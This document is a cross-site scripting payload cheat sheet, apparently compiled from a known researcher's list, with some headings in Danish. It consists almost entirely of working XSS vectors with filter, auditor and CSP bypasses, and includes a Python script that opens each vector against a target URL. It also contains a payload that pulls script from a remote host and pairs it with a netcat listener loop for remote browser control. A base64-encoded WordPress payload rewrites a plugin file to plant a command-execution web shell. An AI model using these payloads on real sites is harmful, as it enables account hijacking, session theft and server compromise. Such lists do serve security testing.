List of Typical Attack Vectors

<script>alert(1)</script>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BODY ONLOAD=alert('XSS')>
"><object onbeforescriptexecute=confirm(1)>
"><object onafterscriptexecute=confirm(0)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
<svg onload=top.onerror=alert;throw'1'>
<svg onload=top.onerror=alert;throw[1]>
<svg onload=alert1>
x#<body onload=confirm('XSSPOSED')>
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<script src=javascript:alert(1)>

"><img src=/ onerror=alert(2)>

<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:alert(1);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
%CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
<svg><set onbegin=alert(1)>
</script><svg><script>alert(1)//
"-alert(1)</script><script>
';onerror=alert;throw 1//
<x onmouseenter=alert(1)>
<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<svg><use xlink:href=data:image/svg%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>

Script with XSS direct for URL

!/usr/bin/python

import urllib
import sys
import webbrowser

url = sys.argv[1]
vectors = sys.argv[2]
with open(vectors, 'r') as f:
for i in f:
try:
XSS = url + i
webbrowser.get('firefox')
webbrowser.open_new_tab(XSS)
except Exception as e:
print "Cannot open url"

Full list of vectors

HTML Context

Tag Injection <svg onload=alert(1)>

"><svg onload=alert(1)//

HTML Context

Inline Injection

"onmouseover=alert(1)//

"autofocus/onfocus=alert(1)//

Javascript Context

Code Injection

'-alert(1)-'

'-alert(1)//

Javascript Context

Code Injection

(escaping the escape)

\'-alert(1)//

Javascript Context

Tag Injection

</script><svg onload=alert(1)>

PHP_SELF Injection http://DOMAIN/PAGE.php/"><svg onload=alert(1)>

Without Parenthesis <svg onload=alert1>

<svg onload=alert(1)>

<svg onload=alert(1&#x29>

<svg onload=alert(1&#41>

<svg onload=top.onerror=alert;throw'1'>

<svg onload=top.onerror=alert;throw[1]>

Filter Bypass

Alert Obfuscation (alert)(1)

a=alert,a(1)

[1].find(alert)

top"al"+"ert"

top/al/.source+/ert/.source

al\u0065rt(1)

top'al\145rt'

top'al\x65rt'

top8680439..toString(30)

Body Tag <body onload=alert(1)>

<body onpageshow=alert(1)>

<body onfocus=alert(1)>

<body onhashchange=alert(1)><a href=#x>click this!#x

<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

<body onscroll=alert(1)><br><br><br><br>

<br><br><br><br><br><br><br><br><br><br>

<br><br><br><br><br><br><br><br><br><br>

<br><br><br><br><br><br><x id=x>#x

<body onresize=alert(1)>press F12!

<body onhelp=alert(1)>press F1! (MSIE)

Miscellaneous Vectors <marquee onstart=alert(1)>

<marquee loop=1 width=0 onfinish=alert(1)>

<audio src onloadstart=alert(1)>

<video onloadstart=alert(1)><source>

<input autofocus onblur=alert(1)>

<keygen autofocus onfocus=alert(1)>

<form onsubmit=alert(1)><input type=submit>

<select onchange=alert(1)><option>1<option>2

<menu id=x contextmenu=x onshow=alert(1)>right click me!

Agnostic Event Handlers

<x contenteditable onblur=alert(1)>lose focus!

<x onclick=alert(1)>click this!

<x oncopy=alert(1)>copy this!

<x oncontextmenu=alert(1)>right click this!

<x oncut=alert(1)>copy this!

<x ondblclick=alert(1)>double click this!

<x ondrag=alert(1)>drag this!

<x contenteditable onfocus=alert(1)>focus this!

<x contenteditable oninput=alert(1)>input here!

<x contenteditable onkeydown=alert(1)>press any key!

<x contenteditable onkeypress=alert(1)>press any key!

<x contenteditable onkeyup=alert(1)>press any key!

<x onmousedown=alert(1)>click this!

<x onmousemove=alert(1)>hover this!

<x onmouseout=alert(1)>hover this!

<x onmouseover=alert(1)>hover this!

<x onmouseup=alert(1)>click this!

<x contenteditable onpaste=alert(1)>paste here!

<x onmouseenter=alert(1)>hover me!

<x onafterscriptexecute=alert(1)>

<x onbeforescriptexecute=alert(1)>

Code Reuse

Inline Script

<script>alert(1)//

<script>alert(1)<!–

Code Reuse

Regular Script

<script src=//brutelogic.com.br/1.js>

<script src=//3334957647/1>

Filter Bypass

Generic Tag + Handler

Encoding Mixed Case Spacers

%3Cx onxxx=1

<%78 onxxx=1

<x %6Fnxxx=1

<x o%6Exxx=1

<x on%78xx=1

<x onxxx%3D1 <X onxxx=1

<x OnXxx=1

<X OnXxx=1

Doubling

<x onxxx=1 onxxx=1

   <x/onxxx=1 

<x%09onxxx=1

<x%0Aonxxx=1

<x%0Conxxx=1

<x%0Donxxx=1

<x%2Fonxxx=1

Quotes Stripping Mimetism

<x 1='1'onxxx=1

<x 1="1"onxxx=1 <[S]x onx[S]xx=1

[S] = stripped char or string <x </onxxx=1

<x 1=">" onxxx=1

<http://onxxx%3D1/

Generic Source Breaking

<x onxxx=alert(1) 1='

Browser Control

<svg onload=setInterval(function(){with(document)body.

appendChild(createElement('script')).src='//HOST:PORT'},0)>

$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done

Multi Reflection

Double Reflection

Single Input Single Input (script-based)

'onload=alert(1)><svg/1=' '>alert(1)</script><script/1='

/alert(1)</script><script>/

Triple Reflection

Single Input Single Input (script-based)

/alert(1)">'onload="/<svg/1='

-alert(1)">'onload="<svg/1=' /</script>'>alert(1)/<script/1='

Multi Input

Double Input Triple Input

p=<svg/1='&q='onload=alert(1)> p=<svg 1='&q='onload='/&r=/alert(1)'>

Without Event Handlers

<script>alert(1)</script>

<script src=javascript:alert(1)>

<iframe src=javascript:alert(1)>

<embed src=javascript:alert(1)>

<a href=javascript:alert(1)>click

<math><brute href=javascript:alert(1)>click

<form action=javascript:alert(1)><input type=submit>

<isindex action=javascript:alert(1) type=submit value=click>

<form><button formaction=javascript:alert(1)>click

<form><input formaction=javascript:alert(1) type=submit value=click>

<form><input formaction=javascript:alert(1) type=image value=click>

<form><input formaction=javascript:alert(1) type=image src=SOURCE>

<isindex formaction=javascript:alert(1) type=submit value=click>

<object data=javascript:alert(1)>

<iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

<svg><script xlink:href=data:,alert(1) />

<math><brute xlink:href=javascript:alert(1)>click

<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

<svg><x><script>alert(1)</x>

<svg><use xlink:href='data:image/svg+xml,<svg id="x"

xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">

<embed xmlns="http://www.w3.org/1999/xhtml"

src="javascript:alert(1)"/></svg>#x'>

<svg><use xlink:href=data:image/svg+xml;base64,PHN2ZyBpZD0iYn

J1dGUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIge

G1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsi

Pg0KPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3h

odG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuZG9tYW

luKSIvPjwvc3ZnPg==#brute>

Mobile Only

Event Handlers

<html ontouchstart=alert(1)>

<html ontouchend=alert(1)>

<html ontouchmove=alert(1)>

<html ontouchcancel=alert(1)>

<body onorientationchange=alert(1)>

Javascript

Properties Functions

<svg onload=alert(navigator.connection.type)>

<svg onload=alert(navigator.battery.level)>

<svg onload=alert(navigator.battery.dischargingTime)>

<svg onload=alert(navigator.battery.charging)> <svg onload=navigator.vibrate(500)>

<svg onload=navigator.vibrate([500,300,100])>

Generic Self to Regular XSS

<iframe src=LOGOUT_URL onload=forms[0].submit()>

</iframe><form method=post action=LOGIN_URL>

<input name=USERNAME_PARAMETER_NAME value=USERNAME>

<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>

File Upload

Injection in Filename

"><img src=1 onerror=alert(1)>.gif

Injection in Metadata

$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg

Injection with SVG File

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

Injection with GIF File as Source of Script (CSP Bypass)

GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

Google Chrome

Auditor Bypass

(up to v51) <script src="data:,alert(1)//

"><script src=data:,alert(1)//

<script src="//brutelogic.com.br/1.js#

"><script src=//brutelogic.com.br/1.js#

<link rel=import href="data:text/html,<script>alert(1)</script>

"><link rel=import href=data:text/html,<script>alert(1)</script>

"><embed allowscriptaccess=always src=//brutelogic.com.br/2.swf#

<embed allowscriptaccess=always src="//brutelogic.com.br/2.swf#

"><object allowscriptaccess=always data=//brutelogic.com.br/2.swf#

<object allowscriptaccess=always data="//brutelogic.com.br/2.swf#

"><base href=//HOST/

<base href="//HOST/

PHP File for

XHR Remote Call

<?php header(“Access-Control-Allow-Origin: *”); ?>

<img src=1 onerror=alert(1)>

Server Log Avoidance

<svg onload=eval(URL.slice(-8))>#alert(1)

<svg onload=eval(location.hash.slice(1)>#alert(1)

<svg onload=innerHTML=location.hash>#<script>alert(1)</script>

Shortest PoC

<base href=//0>

$ while:; do echo "alert(1)" | nc -lp80; done

Portable Wordpress RCE

<script/src="data:,eval(atob(location.hash.slice(1)))//#

eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd

Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w

aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n

X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC

5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV

RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE

9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl

wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD

Qp4LnNlbmQoJCk=

http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD

Multi Context Source-based

</script>"-alert(0)-"><svg onload=';alert(1);'>

DOM-based

//3334957647/0/?0=">"<img src='-alert(1)-' onerror=";alert(1);">

CSP Bypass <script/src=/PATH/PAGE.json?callback=alert(1)//></script>

Shortest Event Handler

<svg><animate attributename=x end=1 onend=alert(1)>

Best-fit Mappings Uppercase

<SCRİPT>alert(1)</SCRİPT>

<SCRİPT/SRC=data:,alert(1)>

Overlong UTF-8

ʺ＞＜svg onload＝alert（1）＞

%CA%BA%EF%BC%9E%EF%BC%9Csvg onload

%EF%BC%9Dalert%EF%BC%881%EF%BC%89%EF%BC%9E

In URLs: & => %26 , # => %23 , + => %2B

XSS bypass til chrome v60

<link rel=import href="data:,%%0D3Cscript>alert(1)%%0D3C%%0D2Fscript>

<iframe src="javascript:alert(1)%%0D3C!—

Chrome v62

%3Cform%3E%3Cinput+type=image+src=//domain/file.jpg+formaction=%22javascript:alert(1)%%0D3C!-%2D

IE11 og Microsoft edge

%27;onerror=alert;throw%271

XSS I XML-filer

<:script xmlns:="hxxp://www.w3.org/1999/xhtml">alert(1)</_:script>

DOM XSS bypass:

\74svg o\156load=alert\501\51>

ASP filter bypass:

%u003csvg onload=alert(1)>

%u3008svg onload=alert(2)>

%uff1csvg onload=alert(3)>